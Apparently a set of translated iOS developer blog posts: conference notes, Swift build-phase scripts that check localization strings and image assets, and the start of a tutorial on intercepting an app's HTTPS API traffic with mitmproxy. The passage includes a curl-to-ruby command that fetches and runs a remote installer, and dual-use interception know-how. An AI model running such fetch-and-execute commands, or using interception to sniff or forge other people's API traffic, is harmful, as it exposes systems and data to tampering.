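As a rough illustration (my own sketch, not from the session; the view and property names are made up), a watchOS screen in SwiftUI can be a single small View struct:

```swift
import SwiftUI

// Hypothetical watchOS 6+ SwiftUI view with a bit of local state.
struct WorkoutSummaryView: View {
    @State private var minutes = 30

    var body: some View {
        VStack(spacing: 8) {
            Text("Today's Workout")
                .font(.headline)
            Text("\(minutes) min")
                .font(.title)
            Button("Add 5 min") {
                minutes += 5
            }
        }
    }
}
```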
Regarding the security issues of the app itself, I had never seriously studied it, with the inherent belief that “Apple is very closed and secure!” After listening to the two speakers’ presentations, I realized how fragile it is and understood the core concept of app security:
“When the cost of cracking exceeds the cost of protection, the app is secure.”
There is no guaranteed secure app, only increasing the difficulty of cracking to deter attackers!
Besides learning about the paid app Reveal, I also discovered the open-source free Lookin for viewing app UI. We often use Reveal; even if not for others, it’s convenient for debugging our own UI issues!
Additionally, regarding connection security, I recently published an article “ The app uses HTTPS transmission, but the data was still stolen. “, using mitmproxy to perform a man-in-the-middle attack by swapping the root CA. The speakers’ explanation of man-in-the-middle attacks, principles, and protection methods not only verified the correctness of my content but also deepened my understanding of this technique! It also broadened my horizons… knowing that there are jailbreak plugins that can directly intercept network requests without even needing certificate swapping.
This has also been a long-standing issue for us, the compilation is very slow; sometimes when making minor UI adjustments, it can be really frustrating. Just adjusting by 1pt, then waiting, then seeing the result, then adjusting by another 1pt, then waiting again, and then adjusting back… while(true)… It’s maddening!
The attempts and experience sharing mentioned by the speaker are really worth going back to study and applying to our own projects!
There were many other sessions (for example, one about colors A_A; I have also run into color issues before), but because my notes are scattered, I lack related experience, or I simply missed the session, I won’t cover them here. For everything else, you can wait for iPlayground 2019 to release the video replays (for recorded sessions), or refer to the official HackMD collaborative notes.
Besides the technical gains, I personally gained more “ soft gains “ than last year. For the first time, I met Ethan Huang in person, and while discussing the Apple Watch development ecosystem, I also unintentionally exchanged a few words with the great Cat God. Additionally, I met many new developers, colleagues Frank and George Liu’s classmate Taihsin, Spock Xue, Crystal Liu, Nia Fan, Alice, Ada, old classmate Peter Chen, old colleague Hao Ge Qiu Yuhao… and many other new friends!
yes!
More highlights can be found on Twitter #iplayground
Thanks to all the staff for their hard work and the speakers for their sharing, making these two days full of gains!
Great job! Thank you!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Introducing multi-language Localization and Image Assets missing-item checks, using Swift to write shell scripts
Photo by Glenn Carstens-Peters
Because of my clumsiness, I often miss the “;” when editing multi-language files, causing the app to display the wrong language after building. Additionally, as development progresses, the language files become increasingly large, with repeated and unused phrases mixed together, making it very chaotic (the same situation applies to Image Assets).
I have always wanted to find a tool to help handle these issues. Previously, I used iOSLocalizationEditor, a Mac APP, but it is more like a language file editor that reads and edits language file content without automatic checking functionality.
Automatically check for errors, omissions, duplicates in multi-language files, and missing Image Assets when building the project.
To achieve our desired features, we need to add a Run Script check script in Build Phases.
However, the check script needs to be written using shell script. Since my proficiency in shell script is not very high, I thought of standing on the shoulders of giants and searching for existing scripts online but couldn’t find any that fully met the desired features. Just when I was about to give up, I suddenly thought:
Shell Script can be written in Swift!
Compared to shell script, I am more familiar and proficient with Swift! Following this direction, I indeed found two existing tool scripts!
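Before looking at those tools, here is a minimal sketch of the idea (with a hypothetical file name): any Swift file with the xcrun shebang can be used as the content of a Build Phases Run Script, and anything it prints in the `file:line: warning:` / `error:` format shows up among Xcode’s build issues:

```swift
#!/usr/bin/env xcrun --sdk macosx swift
// HelloCheck.swift (hypothetical), run from Build Phases as ${SRCROOT}/HelloCheck.swift
import Foundation

// Printing in "path/file:line: warning: message" format surfaces the message in Xcode.
print("MyProject/Localizable.strings:1: warning: Swift run script executed")

// Exiting with a non-zero status would fail the build, e.g. when a check does not pass.
// exit(1)
```

The two freshOS scripts below follow exactly this pattern, just with real checking logic inside.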
Two checking tools written by the freshOS team:
They fully meet our desired feature requirements! And since they are written in Swift, customizing and modifying them is very easy.
Features:
Installation Method:
In Build Phases, add a Run Script whose content is:

${SRCROOT}/Localize.swift

Then open the Localize.swift file for configuration. You can see the configurable items in the upper part of the file:

```swift
// Enable the check script
let enabled = true

// Localization file directory
let relativeLocalizableFolders = "/Resources/Languages"

// Project directory (used to search whether the phrases are used in the code)
let relativeSourceFolder = "/Sources"

// Regular expression patterns for NSLocalized phrases in the code
// You can add your own without changing the existing ones
let patterns = [
    "NSLocalized(Format)?String\\(\\s*@?\"([\\w\\.]+)\"", // Swift and ObjC Native
    "Localizations\\.((?:[A-Z]{1}[a-z]*[A-z]*)*(?:\\.[A-Z]{1}[a-z]*[A-z]*)*)", // Laurine Calls
    "L10n.tr\\(key: \"(\\w+)\"", // SwiftGen generation
    "ypLocalized\\(\"(.*)\"\\)",
    "\"(.*)\".localized" // "key".localized pattern
]

// Phrases to ignore for the "unused phrase" warning
let ignoredFromUnusedKeys: [String] = []
/* example
let ignoredFromUnusedKeys = [
    "NotificationNoOne",
    "NotificationCommentPhoto",
    "NotificationCommentHisPhoto",
    "NotificationCommentHerPhoto"
]
*/

// Main language
let masterLanguage = "en"

// Enable a-z sorting and clean-up of localization files
let sanitizeFiles = false

// Whether the project is single- or multi-language
let singleLanguage = false

// Enable the check for untranslated phrases
let checkForUntranslated = true
```
+5. Build! Success!
+
+
+
+**Check result prompt types:**
+- **Build Error** ❌ **:**
+ - \[Duplication\] The item is duplicated in the localization file
+ - \[Unused Key\] The item is defined in the localization file but not used in the actual code
+ - \[Missing\] The item is used in the actual code but not defined in the localization file
+ - \[Redundant\] The item is redundant in this localization file compared to the main localization file
+ - \[Missing Translation\] The item exists in the main localization file but is missing in this localization file
+- **Build Warning** ⚠️ **:**
+ - \[Potentially Untranslated\] This item is untranslated (same content as the main localization file)
+
+> **_Not done yet, now we have automatic check prompts, but we still need to customize a bit._**
+
+**Custom regular expression matching:**
+
+Looking back at the patterns section in the top configuration block of the check script `Localize.swift`:
+
+`"NSLocalized(Format)?String\\(\\s*@?\"([\\w\\.]+)\""`
+
+This matches the `NSLocalizedString()` method in Swift/ObjC, but this regular expression can only match phrases like `"Home.Title"`. If we have full sentences or phrases with format parameters, they will be mistakenly marked as \[Unused Key\].
+
+EX: `"Hi, %@ welcome to my app", "Hello World!"` **<- These phrases cannot be matched**
+
+We can add a new pattern setting or change the original pattern to:
+
+`"NSLocalized(Format)?String\\(\\s*@?\"([^(\")]+)\""`
+
+The main adjustment is to match any string until the `"` appears, stopping there. You can also [click here](https://rubular.com/r/5eXvGy3svsAHyT){:target="_blank"} to customize according to your needs.
+
+**Add Language File Format Check Functionality:**
+
+This script only checks the content of language files for correspondence and does not check if the file format is correct (whether a ";" is missing). If you need this functionality, you need to add it yourself!
+```swift
+//....
+let formatResult = shell("plutil -lint \(location)")
+guard formatResult.trimmingCharacters(in: .whitespacesAndNewlines).suffix(2) == "OK" else {
+ let str = "\(path)/\(name).lproj"
+ + "/Localizable.strings:1: "
+ + "error: [File Invalid] "
+ + "This Localizable.strings file format is invalid."
+ print(str)
+ numberOfErrors += 1
+ return
+}
+//....
+
+func shell(_ command: String) -> String {
+ let task = Process()
+ let pipe = Pipe()
+
+ task.standardOutput = pipe
+ task.arguments = ["-c", command]
+ task.launchPath = "/bin/bash"
+ task.launch()
+
+ let data = pipe.fileHandleForReading.readDataToEndOfFile()
+ let output = String(data: data, encoding: .utf8)!
+
+ return output
+}
+
Add a `shell()` helper to execute shell commands, and use `plutil -lint` to check whether the language (plist/.strings) file format is correct. If there is an error or a missing “;”, it returns an error message; if there are no errors, it returns OK, which we use as the judgment!
The check can be added after `LocalizationFiles -> process() -> let location = singleLanguage…`, around line 135, or refer to the complete modified version I provide at the end.
Other Customizations:
We can customize according to our needs, such as changing error to warning or removing a certain check function (EX: Potentially Untranslated, Unused Key); the script is in Swift, which we are all familiar with! No fear of breaking or making mistakes!
To show Error ❌ during build:
print("ProjectFile.lproj" + "/File:Line: " + "error: ErrorMessage")
+
To show Warning ⚠️ during build:
print("ProjectFile.lproj" + "/File:Line: " + "warning: WarningMessage")
+
Final Modified Version:
#!/usr/bin/env xcrun --sdk macosx swift
+
+import Foundation
+
+// WHAT
+// 1. Find Missing keys in other Localisation files
+// 2. Find potentially untranslated keys
+// 3. Find Duplicate keys
+// 4. Find Unused keys and generate script to delete them all at once
+
+// MARK: Start Of Configurable Section
+
+/*
+ You can enable or disable the script whenever you want
+ */
+let enabled = true
+
+/*
+ Put your path here, example -> Resources/Localizations/Languages
+ */
+let relativeLocalizableFolders = "/streetvoice/SupportingFiles"
+
+/*
+ This is the path of your source folder which will be used in searching
+ for the localization keys you actually use in your project
+ */
+let relativeSourceFolder = "/streetvoice"
+
+/*
+ Those are the regex patterns to recognize localizations.
+ */
+let patterns = [
+ "NSLocalized(Format)?String\\(\\s*@?\"([^(\")]+)\"", // Swift and Objc Native
+ "Localizations\\.((?:[A-Z]{1}[a-z]*[A-z]*)*(?:\\.[A-Z]{1}[a-z]*[A-z]*)*)", // Laurine Calls
+ "L10n.tr\\(key: \"(\\w+)\"", // SwiftGen generation
+ "ypLocalized\\(\"(.*)\"\\)",
+ "\"(.*)\".localized" // "key".localized pattern
+]
+
+/*
+ Those are the keys you don't want to be recognized as "unused"
+ For instance, Keys that you concatenate will not be detected by the parsing
+ so you want to add them here in order not to create false positives :)
+ */
+let ignoredFromUnusedKeys: [String] = []
+/* example
+let ignoredFromUnusedKeys = [
+ "NotificationNoOne",
+ "NotificationCommentPhoto",
+ "NotificationCommentHisPhoto",
+ "NotificationCommentHerPhoto"
+]
+*/
+
+let masterLanguage = "base"
+
+/*
+ Sanitizing files will remove comments, empty lines and order your keys alphabetically.
+ */
+let sanitizeFiles = false
+
+/*
+ Determines if there are multiple localizations or not.
+ */
+let singleLanguage = false
+
+/*
+ Determines if we should show errors if there's a key within the app
+ that does not appear in master translations.
+*/
+let checkForUntranslated = false
+
+// MARK: End Of Configurable Section
+
+if enabled == false {
+ print("Localization check cancelled")
+ exit(000)
+}
+
+// Detect list of supported languages automatically
+func listSupportedLanguages() -> [String] {
+ var sl: [String] = []
+ let path = FileManager.default.currentDirectoryPath + relativeLocalizableFolders
+ if !FileManager.default.fileExists(atPath: path) {
+ print("Invalid configuration: \(path) does not exist.")
+ exit(1)
+ }
+ let enumerator = FileManager.default.enumerator(atPath: path)
+ let extensionName = "lproj"
+ print("Found these languages:")
+ while let element = enumerator?.nextObject() as? String {
+ if element.hasSuffix(extensionName) {
+ print(element)
+ let name = element.replacingOccurrences(of: ".\(extensionName)", with: "")
+ sl.append(name)
+ }
+ }
+ return sl
+}
+
+let supportedLanguages = listSupportedLanguages()
+var ignoredFromSameTranslation: [String: [String]] = [:]
+let path = FileManager.default.currentDirectoryPath + relativeLocalizableFolders
+var numberOfWarnings = 0
+var numberOfErrors = 0
+
+struct LocalizationFiles {
+ var name = ""
+ var keyValue: [String: String] = [:]
+ var linesNumbers: [String: Int] = [:]
+
+ init(name: String) {
+ self.name = name
+ process()
+ }
+
+ mutating func process() {
+ if sanitizeFiles {
+ removeCommentsFromFile()
+ removeEmptyLinesFromFile()
+ sortLinesAlphabetically()
+ }
+ let location = singleLanguage ? "\(path)/Localizable.strings" : "\(path)/\(name).lproj/Localizable.strings"
+
+ let formatResult = shell("plutil -lint \(location)")
+ guard formatResult.trimmingCharacters(in: .whitespacesAndNewlines).suffix(2) == "OK" else {
+ let str = "\(path)/\(name).lproj"
+ + "/Localizable.strings:1: "
+ + "error: [File Invalid] "
+ + "This Localizable.strings file format is invalid."
+ print(str)
+ numberOfErrors += 1
+ return
+ }
+
+ guard let string = try? String(contentsOfFile: location, encoding: .utf8) else {
+ return
+ }
+
+ let lines = string.components(separatedBy: .newlines)
+ keyValue = [:]
+
+ let pattern = "\"(.*)\" = \"(.+)\";"
+ let regex = try? NSRegularExpression(pattern: pattern, options: [])
+ var ignoredTranslation: [String] = []
+
+ for (lineNumber, line) in lines.enumerated() {
+ let range = NSRange(location: 0, length: (line as NSString).length)
+
+ // Ignored pattern
+ let ignoredPattern = "\"(.*)\" = \"(.+)\"; *\\/\\/ *ignore-same-translation-warning"
+ let ignoredRegex = try? NSRegularExpression(pattern: ignoredPattern, options: [])
+ if let ignoredMatch = ignoredRegex?.firstMatch(in: line,
+ options: [],
+ range: range) {
+ let key = (line as NSString).substring(with: ignoredMatch.range(at: 1))
+ ignoredTranslation.append(key)
+ }
+
+ if let firstMatch = regex?.firstMatch(in: line, options: [], range: range) {
+ let key = (line as NSString).substring(with: firstMatch.range(at: 1))
+ let value = (line as NSString).substring(with: firstMatch.range(at: 2))
+
+ if keyValue[key] != nil {
+ let str = "\(path)/\(name).lproj"
+ + "/Localizable.strings:\(linesNumbers[key]!): "
+ + "error: [Duplication] \"\(key)\" "
+ + "is duplicated in \(name.uppercased()) file"
+ print(str)
+ numberOfErrors += 1
+ } else {
+ keyValue[key] = value
+ linesNumbers[key] = lineNumber + 1
+ }
+ }
+ }
+ print(ignoredFromSameTranslation)
+ ignoredFromSameTranslation[name] = ignoredTranslation
+ }
+
+ func rebuildFileString(from lines: [String]) -> String {
+ return lines.reduce("") { (r: String, s: String) -> String in
+ (r == "") ? (r + s) : (r + "\n" + s)
+ }
+ }
+
+ func removeEmptyLinesFromFile() {
+ let location = "\(path)/\(name).lproj/Localizable.strings"
+ if let string = try? String(contentsOfFile: location, encoding: .utf8) {
+ var lines = string.components(separatedBy: .newlines)
+ lines = lines.filter { $0.trimmingCharacters(in: .whitespaces) != "" }
+ let s = rebuildFileString(from: lines)
+ try? s.write(toFile: location, atomically: false, encoding: .utf8)
+ }
+ }
+
+ func removeCommentsFromFile() {
+ let location = "\(path)/\(name).lproj/Localizable.strings"
+ if let string = try? String(contentsOfFile: location, encoding: .utf8) {
+ var lines = string.components(separatedBy: .newlines)
+ lines = lines.filter { !$0.hasPrefix("//") }
+ let s = rebuildFileString(from: lines)
+ try? s.write(toFile: location, atomically: false, encoding: .utf8)
+ }
+ }
+
+ func sortLinesAlphabetically() {
+ let location = "\(path)/\(name).lproj/Localizable.strings"
+ if let string = try? String(contentsOfFile: location, encoding: .utf8) {
+ let lines = string.components(separatedBy: .newlines)
+
+ var s = ""
+ for (i, l) in sortAlphabetically(lines).enumerated() {
+ s += l
+ if i != lines.count - 1 {
+ s += "\n"
+ }
+ }
+ try? s.write(toFile: location, atomically: false, encoding: .utf8)
+ }
+ }
+
+ func removeEmptyLinesFromLines(_ lines: [String]) -> [String] {
+ return lines.filter { $0.trimmingCharacters(in: .whitespaces) != "" }
+ }
+
+ func sortAlphabetically(_ lines: [String]) -> [String] {
+ return lines.sorted()
+ }
+}
+
+// MARK: - Load Localisation Files in memory
+
+let masterLocalizationFile = LocalizationFiles(name: masterLanguage)
+let localizationFiles = supportedLanguages
+ .filter { $0 != masterLanguage }
+ .map { LocalizationFiles(name: $0) }
+
+// MARK: - Detect Unused Keys
+
+let sourcesPath = FileManager.default.currentDirectoryPath + relativeSourceFolder
+let fileManager = FileManager.default
+let enumerator = fileManager.enumerator(atPath: sourcesPath)
+var localizedStrings: [String] = []
+while let swiftFileLocation = enumerator?.nextObject() as? String {
+ // checks the extension
+ if swiftFileLocation.hasSuffix(".swift") || swiftFileLocation.hasSuffix(".m") || swiftFileLocation.hasSuffix(".mm") {
+ let location = "\(sourcesPath)/\(swiftFileLocation)"
+ if let string = try? String(contentsOfFile: location, encoding: .utf8) {
+ for p in patterns {
+ let regex = try? NSRegularExpression(pattern: p, options: [])
+ let range = NSRange(location: 0, length: (string as NSString).length) // Obj c wa
+ regex?.enumerateMatches(in: string,
+ options: [],
+ range: range,
+ using: { result, _, _ in
+ if let r = result {
+ let value = (string as NSString).substring(with: r.range(at: r.numberOfRanges - 1))
+ localizedStrings.append(value)
+ }
+ })
+ }
+ }
+ }
+}
+
+var masterKeys = Set(masterLocalizationFile.keyValue.keys)
+let usedKeys = Set(localizedStrings)
+let ignored = Set(ignoredFromUnusedKeys)
+let unused = masterKeys.subtracting(usedKeys).subtracting(ignored)
+let untranslated = usedKeys.subtracting(masterKeys)
+
+// Here generate Xcode regex Find and replace script to remove dead keys all at once!
+var replaceCommand = "\"("
+var counter = 0
+for v in unused {
+ var str = "\(path)/\(masterLocalizationFile.name).lproj/Localizable.strings:\(masterLocalizationFile.linesNumbers[v]!): "
+ str += "error: [Unused Key] \"\(v)\" is never used"
+ print(str)
+ numberOfErrors += 1
+ if counter != 0 {
+ replaceCommand += "|"
+ }
+ replaceCommand += v
+ if counter == unused.count - 1 {
+ replaceCommand += ")\" = \".*\";"
+ }
+ counter += 1
+}
+
+print(replaceCommand)
+
+// MARK: - Compare each translation file against master (en)
+
+for file in localizationFiles {
+ for k in masterLocalizationFile.keyValue.keys {
+ if file.keyValue[k] == nil {
+ var str = "\(path)/\(file.name).lproj/Localizable.strings:\(masterLocalizationFile.linesNumbers[k]!): "
+ str += "error: [Missing] \"\(k)\" missing from \(file.name.uppercased()) file"
+ print(str)
+ numberOfErrors += 1
+ }
+ }
+
+ let redundantKeys = file.keyValue.keys.filter { !masterLocalizationFile.keyValue.keys.contains($0) }
+
+ for k in redundantKeys {
+ let str = "\(path)/\(file.name).lproj/Localizable.strings:\(file.linesNumbers[k]!): "
+ + "error: [Redundant key] \"\(k)\" redundant in \(file.name.uppercased()) file"
+
+ print(str)
+ }
+}
+
+if checkForUntranslated {
+ for key in untranslated {
+ var str = "\(path)/\(masterLocalizationFile.name).lproj/Localizable.strings:1: "
+ str += "error: [Missing Translation] \(key) is not translated"
+
+ print(str)
+ numberOfErrors += 1
+ }
+}
+
+print("Number of warnings : \(numberOfWarnings)")
+print("Number of errors : \(numberOfErrors)")
+
+if numberOfErrors > 0 {
+ exit(1)
+}
+
+func shell(_ command: String) -> String {
+ let task = Process()
+ let pipe = Pipe()
+
+ task.standardOutput = pipe
+ task.arguments = ["-c", command]
+ task.launchPath = "/bin/bash"
+ task.launch()
+
+ let data = pipe.fileHandleForReading.readDataToEndOfFile()
+ let output = String(data: data, encoding: .utf8)!
+
+ return output
+}
+
Finally, it’s not over yet!
Once our Swift check script is fully debugged, we should compile it into an executable to reduce build time; otherwise it has to be recompiled on every build (precompiling cuts the script’s time by roughly 90%).
Open Terminal, navigate to the directory in the project where the check script lives, and execute:
swiftc -o Localize Localize.swift
+
Then go back to Build Phases and change the Script content path to the executable
EX: ${SRCROOT}/Localize
Done!
Features:
Installation Method:
${SRCROOT}/AssetChecker.swift
${SRCROOT}/AssetChecker.swift ${SRCROOT}/project_directory ${SRCROOT}/Resources/Images.xcassets
+//${SRCROOT}/Resources/Images.xcassets = the location of your .xcassets
+
You can pass the parameters directly in the path (parameter 1: the project directory, parameter 2: the image asset directory), or edit the parameter block at the top of AssetChecker.swift, just like the localization check tool:
// Configure me \o/
+
+// Project directory location (used to search if images are used in the code)
+var sourcePathOption:String? = nil
+
+// .xcassets directory location
+var assetCatalogPathOption:String? = nil
+
+// Unused warning ignore items
+let ignoredUnusedNames = [String]()
+
Check Result Prompt Types:
Assets listed in ignoredUnusedNames are treated as exceptions. The rest of the operation is the same as the localization check tool, so I won’t repeat it here; the most important thing is to remember to compile the script into an executable after debugging and point the Run Script content at the executable!
We can refer to the image resource check tool script:
#!/usr/bin/env xcrun --sdk macosx swift
+
+import Foundation
+
+// Configure me \o/
+var sourcePathOption:String? = nil
+var assetCatalogPathOption:String? = nil
+let ignoredUnusedNames = [String]()
+
+for (index, arg) in CommandLine.arguments.enumerated() {
+ switch index {
+ case 1:
+ sourcePathOption = arg
+ case 2:
+ assetCatalogPathOption = arg
+ default:
+ break
+ }
+}
+
+guard let sourcePath = sourcePathOption else {
+ print("AssetChecker:: error: Source path was missing!")
+ exit(0)
+}
+
+guard let assetCatalogAbsolutePath = assetCatalogPathOption else {
+ print("AssetChecker:: error: Asset Catalog path was missing!")
+ exit(0)
+}
+
+print("Searching sources in \(sourcePath) for assets in \(assetCatalogAbsolutePath)")
+
+/* Put here the asset generating false positives,
+ For instance when you build asset names at runtime
+let ignoredUnusedNames = [
+ "IconArticle",
+ "IconMedia",
+ "voteEN",
+ "voteES",
+ "voteFR"
+]
+*/
+
+// MARK : - End Of Configurable Section
+func elementsInEnumerator(_ enumerator: FileManager.DirectoryEnumerator?) -> [String] {
+ var elements = [String]()
+ while let e = enumerator?.nextObject() as? String {
+ elements.append(e)
+ }
+ return elements
+}
+
+// MARK: - List Assets
+func listAssets() -> [String] {
+ let extensionName = "imageset"
+ let enumerator = FileManager.default.enumerator(atPath: assetCatalogAbsolutePath)
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(extensionName) } // Is Asset
+ .map { $0.replacingOccurrences(of: ".\(extensionName)", with: "") } // Remove extension
+ .map { $0.components(separatedBy: "/").last ?? $0 } // Remove folder path
+}
+
+// MARK: - List Used Assets in the codebase
+func localizedStrings(inStringFile: String) -> [String] {
+ var localizedStrings = [String]()
+ let namePattern = "([\\w-]+)"
+ let patterns = [
+ "#imageLiteral\\(resourceName: \"\(namePattern)\"\\)", // Image Literal
+ "UIImage\\(named:\\s*\"\(namePattern)\"\\)", // Default UIImage call (Swift)
+ "UIImage imageNamed:\\s*\\@\"\(namePattern)\"", // Default UIImage call
+ "\\<image name=\"\(namePattern)\".*", // Storyboard resources
+ "R.image.\(namePattern)\\(\\)" //R.swift support
+ ]
+ for p in patterns {
+ let regex = try? NSRegularExpression(pattern: p, options: [])
+ let range = NSRange(location:0, length:(inStringFile as NSString).length)
+ regex?.enumerateMatches(in: inStringFile,options: [], range: range) { result, _, _ in
+ if let r = result {
+ let value = (inStringFile as NSString).substring(with:r.range(at: 1))
+ localizedStrings.append(value)
+ }
+ }
+ }
+ return localizedStrings
+}
+
+func listUsedAssetLiterals() -> [String] {
+ let enumerator = FileManager.default.enumerator(atPath:sourcePath)
+ print(sourcePath)
+
+ #if swift(>=4.1)
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(".m") || $0.hasSuffix(".swift") || $0.hasSuffix(".xib") || $0.hasSuffix(".storyboard") } // Only Swift and Obj-C files
+ .map { "\(sourcePath)/\($0)" } // Build file paths
+ .map { try? String(contentsOfFile: $0, encoding: .utf8)} // Get file contents
+ .compactMap{$0}
+ .compactMap{$0} // Remove nil entries
+ .map(localizedStrings) // Find localizedStrings occurrences
+ .flatMap{$0} // Flatten
+ #else
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(".m") || $0.hasSuffix(".swift") || $0.hasSuffix(".xib") || $0.hasSuffix(".storyboard") } // Only Swift and Obj-C files
+ .map { "\(sourcePath)/\($0)" } // Build file paths
+ .map { try? String(contentsOfFile: $0, encoding: .utf8)} // Get file contents
+ .flatMap{$0}
+ .flatMap{$0} // Remove nil entries
+ .map(localizedStrings) // Find localizedStrings occurrences
+ .flatMap{$0} // Flatten
+ #endif
+}
+
+// MARK: - Beginning of script
+let assets = Set(listAssets())
+let used = Set(listUsedAssetLiterals() + ignoredUnusedNames)
+
+// Generate Warnings for Unused Assets
+let unused = assets.subtracting(used)
+unused.forEach { print("\(assetCatalogAbsolutePath):: warning: [Asset Unused] \($0)") }
+
+// Generate Error for broken Assets
+let broken = used.subtracting(assets)
+broken.forEach { print("\(assetCatalogAbsolutePath):: error: [Asset Missing] \($0)") }
+
+if broken.count > 0 {
+ exit(1)
+}
+
Compared to the language check script, this script is concise and has all the important functions, making it very valuable for reference!
P.S. You can see the code still uses the localizedStrings() naming; I suspect the author borrowed the logic from the language check tool and forgot to rename the method XD
Example:
for (index, arg) in CommandLine.arguments.enumerated() {
+ switch index {
+ case 1:
+ // Parameter 1
+ case 2:
+ // Parameter 2
+ default:
+ break
+ }
+}
+
^ Method to receive external parameters
func elementsInEnumerator(_ enumerator: FileManager.DirectoryEnumerator?) -> [String] {
+ var elements = [String]()
+ while let e = enumerator?.nextObject() as? String {
+ elements.append(e)
+ }
+ return elements
+}
+
+func localizedStrings(inStringFile: String) -> [String] {
+ var localizedStrings = [String]()
+ let namePattern = "([\\w-]+)"
+ let patterns = [
+ "#imageLiteral\\(resourceName: \"\(namePattern)\"\\)", // Image Literal
+ "UIImage\\(named:\\s*\"\(namePattern)\"\\)", // Default UIImage call (Swift)
+ "UIImage imageNamed:\\s*\\@\"\(namePattern)\"", // Default UIImage call
+ "\\<image name=\"\(namePattern)\".*", // Storyboard resources
+ "R.image.\(namePattern)\\(\\)" //R.swift support
+ ]
+ for p in patterns {
+ let regex = try? NSRegularExpression(pattern: p, options: [])
+ let range = NSRange(location:0, length:(inStringFile as NSString).length)
+ regex?.enumerateMatches(in: inStringFile,options: [], range: range) { result, _, _ in
+ if let r = result {
+ let value = (inStringFile as NSString).substring(with:r.range(at: 1))
+ localizedStrings.append(value)
+ }
+ }
+ }
+ return localizedStrings
+}
+
+func listUsedAssetLiterals() -> [String] {
+ let enumerator = FileManager.default.enumerator(atPath:sourcePath)
+ print(sourcePath)
+
+ #if swift(>=4.1)
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(".m") || $0.hasSuffix(".swift") || $0.hasSuffix(".xib") || $0.hasSuffix(".storyboard") } // Only Swift and Obj-C files
+ .map { "\(sourcePath)/\($0)" } // Build file paths
+ .map { try? String(contentsOfFile: $0, encoding: .utf8)} // Get file contents
+ .compactMap{$0}
+ .compactMap{$0} // Remove nil entries
+ .map(localizedStrings) // Find localizedStrings occurrences
+ .flatMap{$0} // Flatten
+ #else
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(".m") || $0.hasSuffix(".swift") || $0.hasSuffix(".xib") || $0.hasSuffix(".storyboard") } // Only Swift and Obj-C files
+ .map { "\(sourcePath)/\($0)" } // Build file paths
+ .map { try? String(contentsOfFile: $0, encoding: .utf8)} // Get file contents
+ .flatMap{$0}
+ .flatMap{$0} // Remove nil entries
+ .map(localizedStrings) // Find localizedStrings occurrences
+ .flatMap{$0} // Flatten
+ #endif
+}
+
^ Traverse all project files and perform regex matching
// To make an Error ❌ appear during build:
+print("ProjectFile.lproj" + "/file:line: " + "error: error message")
+// To make a Warning ⚠️ appear during build:
+print("ProjectFile.lproj" + "/file:line: " + "warning: warning message")
+
^ Print an error or a warning
You can refer to the above code methods to create your own desired tools.
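For instance, here is a small sketch of my own (entirely hypothetical, not part of either tool) that combines the three building blocks above into a custom build-phase check which flags leftover “TODO” markers as build warnings:

```swift
#!/usr/bin/env xcrun --sdk macosx swift
// Hypothetical TodoChecker.swift, invoked from Build Phases as:
// ${SRCROOT}/TodoChecker ${SRCROOT}/Sources
import Foundation

// 1. Receive the source directory as an external parameter.
guard CommandLine.arguments.count > 1 else {
    print("TodoChecker:: error: source path was missing!")
    exit(1)
}
let sourcePath = CommandLine.arguments[1]

// 2. Traverse the project files and search for the marker.
let enumerator = FileManager.default.enumerator(atPath: sourcePath)
var warnings = 0
while let file = enumerator?.nextObject() as? String {
    guard file.hasSuffix(".swift"),
          let content = try? String(contentsOfFile: "\(sourcePath)/\(file)", encoding: .utf8) else {
        continue
    }
    // 3. Print in "file:line: warning: message" format so Xcode displays it during the build.
    for (index, line) in content.components(separatedBy: .newlines).enumerated() where line.contains("TODO") {
        print("\(sourcePath)/\(file):\(index + 1): warning: unresolved TODO found")
        warnings += 1
    }
}
print("TodoChecker found \(warnings) TODO(s)")
```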
After introducing these two check tools, we can develop with more confidence and efficiency and cut down on redundant work. This experience was also eye-opening: from now on, whenever a new Build Phases run-script requirement comes up, we can write it directly in the language we know best, Swift!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Using mitmproxy on iOS + macOS to perform a man-in-the-middle attack and sniff API traffic, and how to prevent it?
Recently, we just held an internal CTF competition at the company. While brainstorming for topics, I recalled a project from my university days when I was working on backend (PHP) development. It was a point collection APP with a task list, and upon completing the trigger conditions, it would call an API to earn points. The boss thought that calling the API with HTTPS encrypted transmission was very secure — until I demonstrated a Man-in-the-middle attack, directly sniffing the transmission data and forging API calls to earn points…
In recent years, with the rise of big data, web crawlers are everywhere; the battle between crawlers and anti-crawlers is becoming increasingly intense, with various tricks being used. It’s a constant game of cat and mouse!
Another target for crawlers is the APP’s API. If there are no defenses, it’s almost like leaving the door wide open; it’s not only easy to operate but also clean in format, making it harder to identify and block. So if you’ve exhausted all efforts to block on the web end and data is still being crawled, you might want to check if the APP’s API has any vulnerabilities.
Since I didn’t know how to incorporate this topic into the CTF competition, I decided to write a separate article as a record. This article is just to give a basic concept — HTTPS can be decrypted through certificate replacement and how to enhance security to prevent it. The actual network theory is not my strong suit and has been forgotten, so if you already have a concept of this, you don’t need to spend time reading this article, or just scroll to the bottom to see how to protect your APP!
Environment: macOS + iOS
Android users can directly download Packet Capture (free), iOS users can use Surge 4 (paid) to unlock the man-in-the-middle attack feature, and macOS users can also use another paid app, Charles.
This article mainly explains how to use the free mitmproxy on iOS. If you have the above environment, you don’t need to go through this trouble. Just open the APP on your phone, mount the VPN, and replace the certificate to perform a Man-in-the-middle attack! (Again, please scroll to the bottom to see how to protect your APP!)
[2021/02/25 Update]: Mac has a new free graphical interface program (Proxyman) that can be used, which can be paired with this article for reference in the first part.
Directly use brew to install:
brew install mitmproxy
Installation complete!
p.s. If you encounter brew: command not found, please first install the brew package management tool:
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
After installation, enter the following command in Terminal to activate:
mitmproxy
Startup Successful
Method (1): The Mac connects to Wi-Fi and the phone joins the same Wi-Fi network. Mac's IP address = "System Preferences" -> "Network" -> "Wi-Fi" -> "IP Address".
Method (2) Mac uses a wired network, enables Internet Sharing; phone connects to the hotspot network:
System Preferences -> Sharing -> Select “Ethernet” -> Check “Wi-Fi” -> Enable “Internet Sharing”
